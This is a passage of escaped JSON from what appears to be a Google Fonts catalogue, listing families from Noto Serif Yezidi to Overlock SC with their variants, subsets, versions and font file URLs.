\"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspD6SEkrlGJgmVCqg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspDBSYkrlGJgmVCqg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspDPCYkrlGJgmVCqg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Traditional Nushu\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"nushu\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nototraditionalnushu/v16/SZco3EDkJ7q9FaoMPlmF4Su8hlIjoGh5aj67J011GNh6SYA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Cut\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novacut/v24/KFOkCnSYu8mL-39LkWxPKTM1K9nz.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Flat\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novaflat/v24/QdVUSTc-JgqpytEbVebEuStkm20oJA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Mono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"greek\",\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novamono/v18/Cn-0JtiGWQ5Ajb--MRKfYGxYrdM9Sg.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Oval\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novaoval/v24/jAnEgHdmANHvPenMaswCMY-h3cWkWg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Round\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novaround/v21/flU9Rqquw5UhEnlwTJYTYYfeeetYEBc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novascript/v25/7Au7p_IpkSWSTWaFWkumvmQNEl0O0kEx.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Slim\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novaslim/v24/Z9XUDmZNQAuem8jyZcn-yMOInrib9Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nova Square\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/novasquare/v20/RrQUbo9-9DV7b06QHgSWsZhARYMgGtWA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Numans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/numans/v15/SlGRmQmGupYAfH8IYRggiHVqaQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nunito\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDDshRTM9jo7eTWk.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDOUhRTM9jo7eTWk.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshRTM9jo7eTWk.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDIkhRTM9jo7eTWk.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDGUmRTM9jo7eTWk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDFwmRTM9jo7eTWk.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDDsmRTM9jo7eTWk.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDBImRTM9jo7eTWk.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiLXA3iqzbXWnoeg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNi83A3iqzbXWnoeg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNirXA3iqzbXWnoeg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNin3A3iqzbXWnoeg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNic3c3iqzbXWnoeg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiSnc3iqzbXWnoeg.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiLXc3iqzbXWnoeg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiBHc3iqzbXWnoeg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nunito Sans\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc9yAv5qWVAgVol-.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4GxZrU1QCU5l-06Y.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8WAf5qWVAgVol-.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G3JoU1QCU5l-06Y.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe0qMImSLYBIv1o4X1M8cfe6Kdpickwp.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe0oMImSLYBIv1o4X1M8cce4I95Ad1wpT5A.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc9iB_5qWVAgVol-.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4GwZuU1QCU5l-06Y.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8GBv5qWVAgVol-.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G2JvU1QCU5l-06Y.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8aBf5qWVAgVol-.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G35sU1QCU5l-06Y.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8-BP5qWVAgVol-.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G1ptU1QCU5l-06Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Nuosu SIL\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"yi\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/nuosusil/v3/8vIK7wM3wmRn_kc4uAjeFGxbO_zo-w.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Odibee Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/odibeesans/v14/neIPzCSooYAho6WvjeToRYkyepH9qGsf.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Odor Mean Chey\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/odormeanchey/v27/raxkHiKDttkTe1aOGcJMR1A_4mrY2zqUKafv.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Offside\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/offside/v20/HI_KiYMWKa9QrAykQ5HiRp-dhpQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oi/v15/w8gXH2EuRqtaut6yjBOG.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Old Standard TT\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oldstandardtt/v18/MwQubh3o1vLImiwAVvYawgcf2eVurVC5RHdCZg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/oldstandardtt/v18/MwQsbh3o1vLImiwAVvYawgcf2eVer1q9ZnJSZtQG.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/oldstandardtt/v18/MwQrbh3o1vLImiwAVvYawgcf2eVWEX-dTFxeb80flQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oldenburg\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oldenburg/v20/fC1jPY5JYWzbywv7c4V6UU6oXyndrw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ole\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ole/v3/dFazZf6Z-rd89fw69qJ_ew.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oleo Script\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oleoscript/v14/rax5HieDvtMOe0iICsUccBhasU7Q8Cad.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/oleoscript/v14/raxkHieDvtMOe0iICsUccCDmnmrY2zqUKafv.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oleo Script Swash Caps\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oleoscriptswashcaps/v13/Noaj6Vb-w5SFbTTAsZP_7JkCS08K-jCzDn_HMXquSY0Hg90.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/oleoscriptswashcaps/v13/Noag6Vb-w5SFbTTAsZP_7JkCS08K-jCzDn_HCcaBbYUsn9T5dt0.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oooh Baby\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ooohbaby/v3/2sDcZGJWgJTT2Jf76xQDb2-4C7wFZQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Open Sans\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v34\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0C4nY1M2xLER.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0C4nY1M2xLER.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0C4nY1M2xLER.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1y4nY1M2xLER.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1y4nY1M2xLER.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgshZ1y4nY1M2xLER.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkaVcUwaERZjA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkaVcUwaERZjA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk_RkaVcUwaERZjA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkxhjaVcUwaERZjA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkyFjaVcUwaERZjA.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk0ZjaVcUwaERZjA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oranienbaum\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oranienbaum/v15/OZpHg_txtzZKMuXLIVrx-3zn7kz3dpHc.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Orbitron\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyGy6xpmIyXjU1pg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyKS6xpmIyXjU1pg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyxSmxpmIyXjU1pg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1ny_CmxpmIyXjU1pg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nymymxpmIyXjU1pg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nysimxpmIyXjU1pg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oregano\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oregano/v13/If2IXTPxciS3H4S2kZffPznO3yM.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/oregano/v13/If2KXTPxciS3H4S2oZXVOxvLzyP_qw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Orelega One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/orelegaone/v10/3qTpojOggD2XtAdFb-QXZGt61EcYaQ7F.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Orienta\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/orienta/v13/PlI9FlK4Jrl5Y9zNeyeo9HRFhcU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Original Surfer\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/originalsurfer/v18/RWmQoKGZ9vIirYntXJ3_MbekzNMiDEtvAlaMKw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oswald\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v49\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs13FvgUFoZAaRliE.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs169vgUFoZAaRliE.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs1_FvgUFoZAaRliE.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs18NvgUFoZAaRliE.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs1y9ogUFoZAaRliE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs1xZogUFoZAaRliE.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Outfit\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC0C4G-EiAou6Y.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4bC1C4G-EiAou6Y.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4W61C4G-EiAou6Y.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC1C4G-EiAou6Y.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4QK1C4G-EiAou6Y.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4e6yC4G-EiAou6Y.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4deyC4G-EiAou6Y.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4bCyC4G-EiAou6Y.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4ZmyC4G-EiAou6Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Over the Rainbow\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/overtherainbow/v16/11haGoXG1k_HKhMLUWz7Mc7vvW5upvOm9NA2XG0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Overlock\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/overlock/v15/Z9XVDmdMWRiN1_T9Z4Te4u2El6GC.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/overlock/v15/Z9XTDmdMWRiN1_T9Z7Tc6OmmkrGC7Cs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/overlock/v15/Z9XSDmdMWRiN1_T9Z7xizcmMvL2L9TLT.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/overlock/v15/Z9XQDmdMWRiN1_T9Z7Tc0FWJtrmp8CLTlNs.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/overlock/v15/Z9XSDmdMWRiN1_T9Z7xaz8mMvL2L9TLT.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/overlock/v15/Z9XQDmdMWRiN1_T9Z7Tc0G2Ltrmp8CLTlNs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Overlock SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        